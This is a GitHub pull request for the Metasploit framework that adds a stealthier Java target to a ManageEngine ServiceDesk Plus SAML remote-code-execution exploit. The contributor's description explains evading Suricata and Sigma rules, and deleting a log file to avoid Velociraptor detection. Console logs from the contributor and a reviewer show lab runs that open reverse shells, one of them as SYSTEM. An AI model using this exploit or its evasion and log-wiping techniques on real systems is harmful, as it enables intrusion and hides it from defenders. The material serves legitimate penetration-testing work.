Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add java target for ManageEngine ServiceDesk Plus CVE-2022-47966 #18515

Merged
merged 5 commits into from
Jan 4, 2024
Merged

Add java target for ManageEngine ServiceDesk Plus CVE-2022-47966 #18515

merged 5 commits into from
Jan 4, 2024

Conversation

errorxyz
Copy link
Contributor

@errorxyz errorxyz commented Nov 5, 2023
edited
Loading

Partially fixes: #17641

In this PR, I've added a java target for the manageengine servicedesk plus exploit(CVE-2022-47966) using the payload mentioned in this blogpost to make it more stealthy. It invokes javascript's javascript engine to execute arbitary java. I've used the URLClassLoader class to load a remote payload hosted by metasploit and bypass the Suricata rule mentioned in the blogpost. The exploit uses java/shell_reverse_tcp as its payload since other payloads fail to work. Custom java payloads can be used to execute a particular function to bypass the Sigma rule. Before running the exploit, it deletes the log file that records the error due to the exploit in an attempt to bypass Velociraptor's detection.

Example Usage - ServiceDesk Plus version 14003 on kali linux - Target 0 ('java')

Link to setup vulnerable software here

msf6 > use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
[*] Using configured payload java/shell_reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhosts 20.20.1.181
rhosts => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rport 8080
rport => 8080
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set srvport 8888
srvport => 8888
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set lhost eth0
lhost => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 20.20.1.181:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://20.20.1.181:8888/iDG1ttxftK17p/
[*] Command shell session 55 opened (20.20.1.181:4444 -> 20.20.1.181:37934) at 2023-11-06 02:50:41 +0530
[*] Exploit completed. New session must be opened by now.
[*] Server stopped.

whoami
errorxyz

Once changes for this module are finalized, I'll make the corresponding changes for the other two modules using the same exploit

@errorxyz errorxyz requested a review from sjanusz-r7 November 10, 2023 00:12
@bwatters-r7 bwatters-r7 self-assigned this Dec 5, 2023
@errorxyz
Copy link
Contributor Author

@bwatters-r7 any updates?

@bwatters-r7
Copy link
Contributor

Sorry; I was out for a bit on holiday. I grabbed this because I thought I could knock it out quickly, but my test install's SAML expired, so I need to go back and remember how to get that going. I have not forgotten about this.

@errorxyz
Copy link
Contributor Author

errorxyz commented Jan 4, 2024

Check out the documentation for the module that I've linked with the PR, it doesn't need you to have a active SAML.

@bwatters-r7
Copy link
Contributor 

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.167          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                              g-metasploit.html
   RPORT      8080                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://10.5.135.201:8080/7LHyPSLwpdaM9I/
[*] GET /7LHyPSLwpdaM9I/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /7LHyPSLwpdaM9I/metasploit.dat requested
[+] Sending 200
[*] GET /7LHyPSLwpdaM9I/metasploit.dat requested
[+] Sending the payload configuration data
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/Shell.class requested
[+] Sending additional payload class: javapayload/stage/Shell.class
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/Stage.class requested
[+] Sending additional payload class: javapayload/stage/Stage.class
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/StreamForwarder.class requested
[+] Sending additional payload class: javapayload/stage/StreamForwarder.class
[*] Command shell session 2 opened (10.5.135.201:4444 -> 10.5.134.167:52626) at 2024-01-04 17:12:47 -0600
[*] Exploit completed.
[*] Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\ServiceDesk\bin>
-----
          

C:\Program Files\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system

@bwatters-r7 bwatters-r7 merged commit cdfa421 into rapid7:master Jan 4, 2024
32 checks passed
@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jan 4, 2024
@bwatters-r7
Copy link
Contributor

Release Notes

This PR adds a java target for the manageengine servicedesk plus exploit CVE-2022-47966 using the payload mentioned in this blogpost and deletes the log file that records the error due to the exploit to make it more stealthy.

@bwatters-r7 bwatters-r7 mentioned this pull request Jan 5, 2024
Open
@errorxyz errorxyz deleted the manageengine branch January 16, 2024 20:19
@errorxyz errorxyz mentioned this pull request Feb 6, 2024
Merged
4 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sjanusz-r7 sjanusz-r7 Awaiting requested review from sjanusz-r7

Assignees

@bwatters-r7 bwatters-r7

Labels
rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Change ManageEngine CVE-2022-47966 to be more stealthy
3 participants
@errorxyz @bwatters-r7 @sjanusz-r7